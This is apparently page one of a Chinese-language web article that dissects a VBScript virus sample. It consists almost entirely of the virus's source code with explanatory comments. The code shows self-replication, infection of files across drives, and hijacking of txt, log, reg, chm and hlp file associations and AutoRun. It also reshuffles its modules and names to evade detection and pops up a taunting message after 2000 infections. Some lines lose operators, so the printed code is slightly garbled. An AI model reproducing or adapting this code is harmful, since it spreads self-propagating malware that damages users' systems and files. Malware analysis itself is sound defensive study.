按照我得到的样本中代码顺序分上中下剖析代码:
病毒主要用到的是Wscript.Shell 对象,所以运行的时候任务管理器里都有Wscript.exe程序的进程的... //删除注册表键值函数 引用 Sub DeleteReg(strkey) Dim tmps Set tmps = CreateObject(\"WScript.Shell\") //RegDelete 从注册表中删除指定的键或值 tmps.RegDelete strkey Set tmps = Nothing End Sub //读注册表键值函数 引用 Function ReadReg(strkey) Dim tmps Set tmps = CreateObject(\"WScript.Shell\") //RegRead 从注册表中返回指定的键或值 ReadReg = tmps.RegRead(strkey) Set tmps = Nothing End Function //写注册表键值函数 引用 Sub WriteReg(strkey, Value, vtype) Dim tmps Set tmps = CreateObject(\"WScript.Shell\") If vtype = \"\" Then //RegWrite 在注册表中设置指定的键或值 tmps.RegWrite strkey, Value Else tmps.RegWrite strkey, Value, vtype End If Set tmps = Nothing End Sub //VBS
病毒体程序 引用 Sub ExeVbs_Virus() //除错代码,定义变量 On Error Resume Next Dim objfso, objshell, FullPath_Self, Name_Self, Names Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath Dim Order, Order_Order, Order_Para Dim vbsCode , VbsCode_Virus, VbsCode_WebPage, VbsCode_Victim , MainBody //创建FSO对象,从而可以对文本文件和文件目录进行访问控制 Set objfso = CreateObject(GetFSOName()) //创建WshShell 对象,从而可以对注册表和进程进行访问控制 Set objshell = CreateObject(\"WScript.Shell\") //获取
病毒体文件路径(WScript.ScriptFullName ’返回当前运行脚本的完整路径) FullPath_Self = WScript.ScriptFullName //获取
病毒体文件名(WScript.ScriptName ’返回当前双击执行的WSF或VBS或JS文件的文件名) Name_Self = WScript.ScriptName //定义模块名称数组,下面用到 Names = Array(\"ATRWZPCAQPMYT\", \"SXHBAKUUEZF\") //获得脚本外界参数 Set oArgs = WScript.Arguments ArgNum = 0 //WScript.Arguments.count ’返回用户所拖放文件至脚本时的拖放文件个数 //WScript.Echo WScript.Arguments(0) ’返回用户所拖放文件第1个单个文件的完整路径和名称 Do While ArgNum < oArgs.Count Para_V = Para_V & \" \" & oArgs(ArgNum) ArgNum = ArgNum 1 Loop //获取参数后缀 SubPara_V = LCase(Right(Para_V, 3)) Select Case SubPara_V //AutoRun启动 Case \"run\" //获取驱动器名称 RunPath = Left(FullPath_Self, 2) //打开驱动器 Call Run(RunPath) // 获得全局变量vbsCode 得到自身
病毒代码 vbsCode = GetSelfCode(objfso, FullPath_Self) //生成
病毒体代码架构 VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V //更换
病毒体模块顺序 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) //更换名称 VbsCode_Virus = ChangeName(VbsCode_Virus, Names) //主程序文件检查 Call InvadeSystem(objfso, VbsCode_Virus) //运行程序 Call Run(FullPath_V1) //txt,log关联启动 Case \"txt\", \"log\" //运行相关txt,log文件 RunPath = \"%SystemRoot%\system32\NOTEPAD.EXE \" & Para_V Call Run(RunPath) vbsCode = GetSelfCode(objfso, FullPath_Self) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call InvadeSystem(objfso, VbsCode_Virus) //运行
病毒文件 Call Run(FullPath_V1) //reg关联启动 Case \"reg\" //运行相关reg文件 Para_V = \"regedit.exe \" & \"\"\"\" & Trim(Para_V) & \"\"\"\" Call Run(Para_V) vbsCode = GetSelfCode(objfso, FullPath_Self) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call InvadeSystem(objfso, VbsCode_Virus) Call Run(FullPath_V1) //chm关联启动 Case \"chm\" //运行相关chm文件 Para_V = \"hh.exe \" & \"\"\"\" & Trim(Para_V) & \"\"\"\" Call Run(Para_V) vbsCode = GetSelfCode(objfso, FullPath_Self) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call InvadeSystem(objfso, VbsCode_Virus) Call Run(FullPath_V1) //hlp关联启动 Case \"hlp\" //运行相关hlp文件 Para_V = \"winhlp32.exe \" & \"\"\"\" & Trim(Para_V) & \"\"\"\" Call Run(Para_V) vbsCode = GetSelfCode(objfso, FullPath_Self) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call InvadeSystem(objfso, VbsCode_Virus) Call Run(FullPath_V1) //正常启动 Case Else //如果
病毒已在运行就退出 If PreInstance = True Then WScript.Quit End If //如果可以感染 If IsOK(objfso, Date(), FullPath_Config) = False Then //如果配置文件已经存在 If objfso.FileExists(FullPath_Config) = True Then //获取Order名称 Order = Trim(ReadOK(objfso, FullPath_Config)) Order_Order = Trim(Mid(Order, 1, InStr(1, Order, \"@\") -1)) Order_Para = Trim(Mid(Order, InStr(1, Order, \"@\") 1, Len(Order) - InStr(1, Order, \"@\"))) End If Select Case Order_Order //如果命令名称是InfectFiles,则进行感染 Case \"InfectFiles\" vbsCode = GetSelfCode(objfso, FullPath_Self) MainBody = GetMainBody(vbsCode, Sum_ModelCode) VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode) VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names) VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode) VbsCode_Victim = ChangeName(VbsCode_Victim, Names) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0) Order_Para = Order_Para Cnt //超过2000个文件则改操作命令为msg,以及命令内容 If Order_Para>2000 Then Call WriteOK(objfso, FullPath_Config, \"Msg\", \"您已有超过2000个文件被感染!不过请放心,此
病毒很容易被清除!请联系418465***-_- !\") Else Call WriteOK(objfso, FullPath_Config, \"InfectFiles\", Order_Para) End If Call InvadeSystem(objfso, VbsCode_Virus) Call MonitorSystem(objfso, VbsCode_Virus) //如果命令名称是msg,则弹出提示 Case \"Msg\" MsgBox Order_Para Call WriteOK(objfso, FullPath_Config, \"\", \"\") vbsCode = GetSelfCode(objfso, FullPath_Self) MainBody = GetMainBody(vbsCode, Sum_ModelCode) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call InvadeSystem(objfso, VbsCode_Virus) Call MonitorSystem(objfso, VbsCode_Virus) //如果命令名称是UnLoadMe,则自我清楚恢复系统 Case \"UnLoadMe\" Call RestoreSystem(objfso) Wscript.Quit //如果命令名称是KillVirus,则自我清楚恢复系统并且恢复被感染的文件 Case \"KillVirus\" Call RestoreSystem(objfso) Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1) Wscript.Quit //如果是其他,则传播 Case Else vbsCode = GetSelfCode(objfso, FullPath_Self) MainBody = GetMainBody(vbsCode, Sum_ModelCode) VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode) VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names) VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode) VbsCode_Victim = ChangeName(VbsCode_Victim, Names) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0) Call WriteOK(objfso, FullPath_Config, \"InfectFiles\", Cnt) Call InvadeSystem(objfso, VbsCode_Virus) Call MonitorSystem(objfso, VbsCode_Virus) End Select Else vbsCode = GetSelfCode(objfso, FullPath_Self) MainBody = GetMainBody(vbsCode, Sum_ModelCode) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V ’生成
病毒体完整代码 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) ’改变模块组合顺序 VbsCode_Virus = ChangeName(VbsCode_Virus, Names) ’改变模块标志名称 Call MonitorSystem(objfso, VbsCode_Virus) End If End Select Set objfso = Nothing Set objshell = Nothing End Sub //
病毒开始,排错并定义 引用 On Error Resume Next Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V Dim ModelHead, ModelTail Cnt = 0 //感染文件的最大数目 CntMax = 1000 //版本号 Version = \"4\" //定义
病毒文件名称 Name_V1 = GetUserName() & \".vbs\" FullPath_V0 = GetSFolder(0) & Name_V1 ’主要执行文件关联转向 FullPath_V1 = GetSFolder(1) & Name_V1 ’主要执行配置文件命令 //定义配置文件名称 FullPath_Config= GetSFolder(1) & GetUserName() & \".ini\" Sum_ModelCode = 26 Head_V= GetHeadTail(0) Tail_V= GetHeadTail(1) //定义模块头部与尾部名称 ModelHead=\"’ATRWZPCAQPMYT\" ModelTail=\"’SXHBAKUUEZF\"
1 2 下一页
投递文章
投稿指南
